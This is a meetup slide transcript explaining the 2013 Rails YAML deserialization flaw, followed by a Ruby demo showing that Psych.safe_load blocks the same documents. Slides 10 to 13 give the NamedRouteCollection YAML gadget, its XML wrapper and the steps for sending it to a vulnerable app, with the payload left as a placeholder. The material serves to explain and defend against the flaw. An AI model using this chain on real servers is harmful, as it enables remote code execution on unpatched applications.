Rails YAML vuln.

Quick presentation on the YAML vuln and the impact on a Rails application.
Made at: http://rubybdx.org/


Damian Le Nouaille

February 06, 2013


  1. YAML in Ruby

  2. “This is a VULN” “No, this is a feature.” YAML allows us to represent Ruby objects directly.
  3. YAML deserializes blobs: “!ruby/object:MyClass” will execute “MyClass.allocate”.

  4. Example (really simplistic) (this is not real code, but a vulnerable

  5. Normal: Hacked:

  6. Normal result: Hacked result:

  7. YAML creates objects, with code execution on “[]=” (and more methods). Is there a Rails class with that?
  9. When the fun begins: ActionDispatch::Routing::RouteSet::NamedRouteCollection (https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/routing/route_set.rb#L113) aliases “[]=” to “add”.
  10. Back to Rails. Let’s create a YAML string:

      ---
      !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
      ? #{encoded_payload}
      : !ruby/struct
        defaults:
          :action: create
          :controller: foos
        required_parts: []
        requirements:
          :action: create
          :controller: foos
        segment_keys:
        - :format
  11. Inject that YAML in XML:

      <?xml version="1.0" encoding="UTF-8"?>
      <exploit type="yaml">#{yaml.html_escape}</exploit>

  12. Send the XML to the app

  13. Rails will deserialize the params[], the XML, the YAML, and will execute the payload.
  14. Rails will deserialize the params[], the XML, the YAML, and will execute the payload ... without 500 errors.
  16. Demo on 3.2.10 simple scaffold app.

  18. Demo on 3.2.11

  20. NOT a Rails problem. It’s a YAML feature. Ok ... Rails problem too. UPGRADE to 3.2.11.
  21. Credit photo/text:
      http://rubysource.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-vulnerability/
      http://www.kalzumeus.com/2013/01/31/what-the-rails-security-issue-means-for-your-startup/
      http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html
      http://ronin-ruby.github.com/blog/2013/01/28/new-rails-poc.html
      http://lesjoiesducode.tumblr.com/
      Thanks. @DAMLN
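Slides 3 and 7 name the two mechanisms: a “!ruby/object” tag makes Psych allocate whatever class the document names, and a “!ruby/hash” tag makes it call that class’s “[]=” for every key/value pair, which is why a class with an interesting “[]=” (like NamedRouteCollection) matters. The Ruby example below is added here and is not part of the deck; it reproduces both behaviours on two harmless classes constructed for the example (Widget and AuditedHash), uses legacy_load as a stand-in for the permissive YAML.load of 2013, and shows that Psych.safe_load rejects the same documents before any method runs.

```ruby
require 'yaml'

# Constructed stand-in for a class whose []= runs code when YAML builds it
# (the deck's point about NamedRouteCollection); not Rails code.
class AuditedHash < Hash
  attr_reader :calls
  def []=(key, value)
    (@calls ||= []) << key.to_s   # in the real target, arbitrary code runs here
    super
  end
end

# Constructed application class for the !ruby/object example.
class Widget
  attr_accessor :name
end

# Constructed attacker-controlled documents using the tags shown on the slides.
OBJECT_YAML = "--- !ruby/object:Widget\nname: injected\n"
HASH_YAML   = "--- !ruby/hash:AuditedHash\ninjected_key: 1\n"

# Psych 4 (Ruby 3.1+) made YAML.load safe by default and kept the old,
# permissive behaviour as unsafe_load; this reproduces the 2013-era YAML.load.
def legacy_load(yaml)
  Psych.respond_to?(:unsafe_load) ? Psych.unsafe_load(yaml) : Psych.load(yaml)
end

# Hardened form: safe_load only revives core scalars, arrays and hashes, so
# every !ruby/* tag is rejected with Psych::DisallowedClass.
def safe_parse(yaml)
  Psych.safe_load(yaml)
  :loaded
rescue Psych::DisallowedClass => e
  "rejected: #{e.message}"
end

if __FILE__ == $0
  w = legacy_load(OBJECT_YAML)
  puts "#{w.class} allocated, name=#{w.name}"   # Widget allocated, name=injected
  h = legacy_load(HASH_YAML)
  puts "[]= ran for #{h.calls.inspect}"          # []= ran for ["injected_key"]
  puts safe_parse(OBJECT_YAML)                   # rejected: ...
  puts safe_parse(HASH_YAML)                     # rejected: ...
end
```

The same check applies to any parser that reaches YAML from untrusted input (the XML-with-YAML path in slides 11 to 14 included): only the allow-list loader is safe to expose.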